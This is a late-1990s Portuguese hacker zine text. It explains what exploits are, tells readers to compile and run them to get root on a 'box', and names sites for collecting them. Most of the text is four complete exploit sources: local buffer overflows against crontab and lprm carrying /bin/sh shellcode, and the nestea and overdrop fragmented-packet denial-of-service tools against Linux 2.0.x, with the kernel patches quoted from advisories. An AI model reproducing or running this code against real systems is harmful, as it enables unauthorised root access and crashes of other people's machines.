text size:
CRT glow:
<<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>>
1*********** Xploit[]'s ***********1
1-INTRODUÇAO :
Recentemente há uma grande dúvida ainda sobre os taos falados
exploits.
Muita gente ainda nao sabe direito o que sao, o que fazem, como
usar, porque sao tao procurados.
Entao nesse texto vamos tentar tirar essas duvidas.
2-O que é um exploit :
Simplificando a explicaçao, um exploit é um programa que "explora"
um bug em um software especifico. Todos os exploits sao diferentes,
eles fazem coisas diferentes e exploram bugs diferentes nos
sistemas. Por isso um exploit é sempre um programa especifico.
Foram feitos pra te dar acesso root em diferentes sistemas. Eles
conseguem isso explorando um bug em um software quando ele esta
rodando como root.
3-Como eu uso um exploit :
Desde que os exploits sao escritos em C em 99% das vezes, você
vai precisar de uma shell na box em que voce for usar o exploit,
ou, você precisa estar usando o mesmo sistema operacional da box
que você está tentando hackear. Entao, basicamente você precisa
colocar o codigo do source ou o binario no diretório acconts da
sua shell. Para colocar isso na sua shell voce pode entrar via
ftp e fazer upload dos desse jeito ou voce pode usar rz se você
tiver usando uma shell dialup.
Já que voce tem agora o exploit na box voce só precisa compilar!
Normalmente se compila o exploit como isso :
blah:~/$gcc exploit.c
Isso deve compilar seu exploit. De qualquer forma fique atento
porque tem alguns exploits que sao sacanagens, pra pegar gente que
nao manja de C.
Depois de compilar o exploit está pronto. Rode o exploit que seu
trabalho será feito!
3-Onde posso pegar exploits.
Dois sites bem legais sÒo esses :
http://get.your.exploits.com
http://www.rootshell.com
Bom, acho que já falei o básico dos exploits. Pelo menos voces já
tem uma noçaozinha do que sao e o que fazem essas maravilhas.
Espero que tenhamos esclarecido algumas duvidas.
Agora mais exploit[]'Z
Exploit do overflow no LINUX BY Dave G.
-------------------------------Corta
/*
*
* Dave G.
* <daveg@escape.com>
* http://www.escape.com/~daveg
*
*
*/
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#define DEFAULT_OFFSET -1240
#define BUFFER_SIZE 100 /* MAX_TEMPSTR is 100 */
#define HAPPY_FILE "./Window"
long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
main(int argc, char **argv)
{
int fd;
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
/*
* The sscanf line reads for 'name' as %[^ =]. Neither a space, nor
* a '=' character appears below
*/
int i;
int ofs = DEFAULT_OFFSET;
/* if we have a argument, use it as offset, else use default */
if(argc == 2)
ofs = atoi(argv[1]);
else if (argc > 2) {
fprintf(stderr, "egg [offset]\n");
exit(-1);
}
/* print the offset in use */
printf("Using offset of esp + %d (%x)\n", ofs, get_esp()+ofs);
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
/* fill start of buffer with nops */
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
/* stick asm code into the buffer */
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i < (878/4);i++)
*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr++ = '=';
*ptr++ = 'X';
*ptr++ = '\n';
*ptr = 0;
printf("Writing to %s\n", HAPPY_FILE);
fd = open(HAPPY_FILE, O_WRONLY|O_CREAT, 0666);
write (fd, buff, strlen(buff));
close(fd);
execl("/usr/bin/crontab","crontab",HAPPY_FILE,NULL);
/* Successful completion */
exit(0);
}
-----------------------------------Corta
------------------------------------------------------------------------------
Outro clássico overflow em Linux 4.2 BY Chris Evans
-------------------------------------Corta
/* lprm.c
*
*
*
* Exploit bug descoberto por Chris Evans no Linux lprm.
*/
#include <stdio.h>
#define PRINTER "-Pwhatever"
static inline getesp() {
__asm__(" movl %esp,%eax ");
}
main(int argc, char **argv) {
int i,j,buffer,offset;
long unsigned esp;
char unsigned buf[4096];
unsigned char
shellcode[]="\x89\xe1\x31\xc0\x50\x8d\x5c\x24\xf9\x83\xc4\x0c"
"\x50\x53\x89\xca\xb0\x0b\xcd\x80/bin/sh";
buffer=990;
offset=3000;
if (argc>1)buffer=atoi(argv[1]);
if (argc>2)offset=atoi(argv[2]);
for (i=0;i<buffer;i++)
buf[i]=0x41; /* inc ecx */
j=0;
for (i=buffer;i<buffer+strlen(shellcode);i++)
buf[i]=shellcode[j++];
esp=getesp()+offset;
buf[i]=esp & 0xFF;
buf[i+1]=(esp >> 8) & 0xFF;
buf[i+2]=(esp >> 16) & 0xFF;
buf[i+3]=(esp >> 24) & 0xFF;
buf[i+4]=esp & 0xFF;
buf[i+5]=(esp >> 8) & 0xFF;
buf[i+6]=(esp >> 16) & 0xFF;
buf[i+7]=(esp >> 24) & 0xFF;
printf("Offset: 0x%x\n\n",esp);
execl("/usr/bin/lprm","lprm",PRINTER,buf,NULL);
}
----------------------------------------------------Corta
------------------------------------------------------------------------------
Bug do IP em Linux 2.0.33 BY Alan Cox
-------------------------------------------------Corta
Date: Thu, 16 Apr 1998 15:09:56 +0100
Reply-To: Alan Cox <alan@CYMRU.NET>
Subject: Linux 2.0.33 vulnerability: fragment patterns
Ok duplicated. There's an 'off by one IP header' bug
--- ip_fragment.c.old Thu Apr 16 12:25:34 1998
+++ ip_fragment.c Thu Apr 16 12:29:02 1998
@@ -375,7 +375,7 @@
fp = qp->fragments;
while(fp != NULL)
{
- if (fp->len < 0 || count+fp->len > skb->len)
+ if (fp->len < 0 || fp->offset+qp->ihlen+fp->len > skb->len)
{
NETDEBUG(printk("Invalid fragment list: Fragment over size.\n"));
ip_free(qp);
------------------------------------------------------------------
//
//
//
// nestea.c by humble of rhino9 4/16/98
// This exploits the "off by one ip header" bug in the linux ip frag code.
// Crashes linux 2.0.* and 2.1.* and some windows boxes
// this code is a total rip of teardrop - it's messy
// hi sygma
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
// bsd usage is currently broken because of socket options on the third sendto
#ifdef STRANGE_BSD_BYTE_ORDERING_THING
/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n) (n)
#else /* OpenBSD 2.1, all Linux */
#define FIX(n) htons(n)
#endif /* STRANGE_BSD_BYTE_ORDERING_THING */
#define IP_MF 0x2000 /* More IP fragment en route */
#define IPH 0x14 /* IP header size */
#define UDPH 0x8 /* UDP header size */
#define MAGIC2 108
#define PADDING 256 /* datagram frame padding for first packet */
#define COUNT 500 /* we are overwriting a small number of bytes we
shouldnt have access to in the kernel.
to be safe, we should hit them till they die :> */
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);
int main(int argc, char **argv)
{
int one = 1, count = 0, i, rip_sock;
u_long src_ip = 0, dst_ip = 0;
u_short src_prt = 0, dst_prt = 0;
struct in_addr addr;
if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
perror("raw socket");
exit(1);
}
if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
< 0)
{
perror("IP_HDRINCL");
exit(1);
}
if (argc < 3) usage(argv[0]);
if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
{
fprintf(stderr, "What the hell kind of IP address is that?\n");
exit(1);
}
while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
{
switch (i)
{
case 's': /* source port (should be emphemeral) */
src_prt = (u_short)atoi(optarg);
break;
case 't': /* dest port (DNS, anyone?) */
dst_prt = (u_short)atoi(optarg);
break;
case 'n': /* number to send */
count = atoi(optarg);
break;
default :
usage(argv[0]);
break; /* NOTREACHED */
}
}
srandom((unsigned)(time((time_t)0)));
if (!src_prt) src_prt = (random() % 0xffff);
if (!dst_prt) dst_prt = (random() % 0xffff);
if (!count) count = COUNT;
fprintf(stderr, "Nestea by humble\nCode ripped from teardrop by route / daemon9\n");
fprintf(stderr, "Death on flaxen wings (yet again):\n");
addr.s_addr = src_ip;
fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
addr.s_addr = dst_ip;
fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
fprintf(stderr, " Amt: %5d\n", count);
fprintf(stderr, "[ ");
for (i = 0; i < count; i++)
{
send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
fprintf(stderr, "b00m ");
usleep(500);
}
fprintf(stderr, "]\n");
return (0);
}
void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
u_short dst_prt)
{
int i;
u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */
u_char byte; /* a byte */
struct sockaddr_in sin; /* socket protocol structure */
sin.sin_family = AF_INET;
sin.sin_port = src_prt;
sin.sin_addr.s_addr = dst_ip;
packet = (u_char *)malloc(IPH + UDPH + PADDING+40);
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
byte = 0x45; /* IP version and header length */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + 10); /* total length */
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
p_ptr += 2;
*((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; /* IP TTL */
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
p_ptr += 4; /* IP checksum filled in by kernel */
*((u_long *)p_ptr) = src_ip; /* IP source address */
p_ptr += 4;
*((u_long *)p_ptr) = dst_ip; /* IP destination address */
p_ptr += 4;
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(8 + 10); /* UDP total length */
if (sendto(sock, packet, IPH + UDPH + 10, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
byte = 0x45; /* IP version and header length */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + MAGIC2); /* total length */
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
p_ptr += 2;
*((u_short *)p_ptr) = FIX(6); /* IP frag flags and offset */
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; /* IP TTL */
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
p_ptr += 4; /* IP checksum filled in by kernel */
*((u_long *)p_ptr) = src_ip; /* IP source address */
p_ptr += 4;
*((u_long *)p_ptr) = dst_ip; /* IP destination address */
p_ptr += 4;
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(8 + MAGIC2); /* UDP total length */
if (sendto(sock, packet, IPH + UDPH + MAGIC2, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING+40);
byte = 0x4F; /* IP version and header length */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING+40); /* total length */
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
p_ptr += 2;
*((u_short *)p_ptr) = 0 | FIX(IP_MF); /* IP frag flags and offset */
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; /* IP TTL */
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
p_ptr += 4; /* IP checksum filled in by kernel */
*((u_long *)p_ptr) = src_ip; /* IP source address */
p_ptr += 4;
*((u_long *)p_ptr) = dst_ip; /* IP destination address */
p_ptr += 44;
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(8 + PADDING); /* UDP total length */
for(i=0;i<PADDING;i++)
{
p_ptr[i++]=random()%255;
}
if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
free(packet);
}
u_long name_resolve(u_char *host_name)
{
struct in_addr addr;
struct hostent *host_ent;
if ((addr.s_addr = inet_addr(host_name)) == -1)
{
if (!(host_ent = gethostbyname(host_name))) return (0);
bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
}
return (addr.s_addr);
}
void usage(u_char *name)
{
fprintf(stderr,
"%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",
name);
exit(0);
}
-----------------------------------------------Corta
------------------------------------------------------------------------------
Ovedrop em Linux 2.0.33 BY Michal Zalewski
----------------------------------------------------------Corta
From lcamtuf@boss.staszic.waw.pl Sat Apr 18 09:06:58 1998
Date: Sat, 18 Apr 1998 11:48:33 +0200 (CEST)
From: Michal Zalewski <lcamtuf@boss.staszic.waw.pl>
Subject: ip_fragment.c - printk() problem.
Here's a DoS exploit against Linux 2.0.33... It doesn't crash
anything, but it's very annoying ;)
Fix:
--- ip_fragment.c.orig Fri Apr 17 16:42:38 1998
+++ ip_fragment.c Fri Apr 17 17:17:15 1998
@@ -345,7 +345,7 @@
if(len>65535)
{
- printk("Oversized IP packet from %s.\n", in_ntoa(qp->iph->saddr));
+ NETDEBUG(printk("Oversized IP packet from %s.\n", in_ntoa(qp->iph->saddr)));
ip_statistics.IpReasmFails++;
ip_free(qp);
return NULL;
-------------------------------------------------------------------------
//
// overdrop by lcamtuf [Linux 2.0.33 printk abuse]
// ------------------------------------------------
// based on (reaped from) teardrop by route|daemon9
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#define IP_MF 0x2000
#define IPH 0x14
#define UDPH 0x8
#define PADDING 0x1c
#define MAGIC 0x3
#define COUNT 0xBEEF
#define FRAG2 0xFFFF
void usage(char *name) {
fprintf(stderr,"%s dst_ip [ -n how_many ] [ -s src_ip ] [ -x ] (use -x for express delivery).\n",name);
exit(0);
}
u_long name_resolve(char *host_name) {
struct in_addr addr;
struct hostent *host_ent;
if ((addr.s_addr=inet_addr(host_name))==-1) {
if (!(host_ent=gethostbyname(host_name))) return (0);
bcopy(host_ent->h_addr,(char *)&addr.s_addr,host_ent->h_length);
}
return (addr.s_addr);
}
void send_frags(int sock,u_long src_ip,u_long dst_ip,u_short src_prt,u_short dst_prt) {
u_char *packet=NULL,*p_ptr=NULL;
u_char byte;
struct sockaddr_in sin;
sin.sin_family=AF_INET;
sin.sin_port=src_prt;
sin.sin_addr.s_addr=dst_ip;
packet=(u_char *)malloc(IPH+UDPH+PADDING);
p_ptr=packet;
bzero((u_char *)p_ptr,IPH+UDPH+PADDING);
byte=0x45;
memcpy(p_ptr,&byte,sizeof(u_char));
p_ptr+=2;
*((u_short *)p_ptr)=htons(IPH+UDPH+PADDING);
p_ptr+=2;
*((u_short *)p_ptr)=htons(242);
p_ptr+=2;
*((u_short *)p_ptr)|=htons(IP_MF);
p_ptr+=2;
*((u_short *)p_ptr)=0x40;
byte=IPPROTO_UDP;
memcpy(p_ptr+1,&byte,sizeof(u_char));
p_ptr+=4;
*((u_long *)p_ptr)=src_ip;
p_ptr+=4;
*((u_long *)p_ptr)=dst_ip;
p_ptr+=4;
*((u_short *)p_ptr)=htons(src_prt);
p_ptr+=2;
*((u_short *)p_ptr)=htons(dst_prt);
p_ptr+=2;
*((u_short *)p_ptr)=htons(8+PADDING);
if (sendto(sock,packet,IPH+UDPH+PADDING,0,(struct sockaddr *)&sin,
sizeof(struct sockaddr))==-1) {
perror("\nsendto");
free(packet);
exit(1);
}
p_ptr=&packet[2];
*((u_short *)p_ptr)=htons(IPH+MAGIC+1);
p_ptr+=4;
*((u_short *)p_ptr)=htons(FRAG2);
if (sendto(sock,packet,IPH+MAGIC+1,0,(struct sockaddr *)&sin,
sizeof(struct sockaddr))==-1) {
perror("\nsendto");
free(packet);
exit(1);
}
free(packet);
}
int main(int argc, char **argv) {
int one=1,count=0,i,rip_sock,lag=500;
u_long src_ip=0,dst_ip=0;
u_short src_prt=0,dst_prt=0;
struct in_addr addr;
fprintf(stderr,"overdrop by lcamtuf [based on teardrop by route|daemon9]\n\n");
if((rip_sock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0) {
perror("raw socket");
exit(1);
}
if (setsockopt(rip_sock,IPPROTO_IP,IP_HDRINCL,(char *)&one,sizeof(one))<0) {
perror("IP_HDRINCL");
exit(1);
}
if (argc < 2) usage(argv[0]);
if (!(dst_ip=name_resolve(argv[1]))) {
fprintf(stderr,"Can't resolve destination address.\n");
exit(1);
}
while ((i=getopt(argc,argv,"s:n:x"))!=EOF) {
switch (i) {
case 'n':
count = atoi(optarg);
break;
case 's':
if (!(src_ip=name_resolve(optarg))) {
fprintf(stderr,"Can't resolve source address.\n");
exit(1);
}
break;
case 'x':
lag=0;
break;
default:
usage(argv[0]);
break;
}
}
srandom((unsigned)(time((time_t)0)));
if (!count) count=COUNT;
fprintf(stderr,"Sending oversized packets:\nFrom: ");
if (!src_ip) fprintf(stderr," (random)"); else {
addr.s_addr = src_ip;
fprintf(stderr,"%15s",inet_ntoa(addr));
}
addr.s_addr = dst_ip;
fprintf(stderr,"\n To: %15s\n",inet_ntoa(addr));
fprintf(stderr," Amt: %5d\n",count);
fprintf(stderr,"[ ");
for (i=0;i<count;i++) {
if (!src_ip) send_frags(rip_sock,rand(),dst_ip,rand(),rand()); else
send_frags(rip_sock,src_ip,dst_ip,rand(),rand());
fprintf(stderr, "b00z ");
usleep(lag);
}
fprintf(stderr, "]\n");
return (0);
}
-------------------------------Corta
------------------------------------------------------------------------------
<<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>>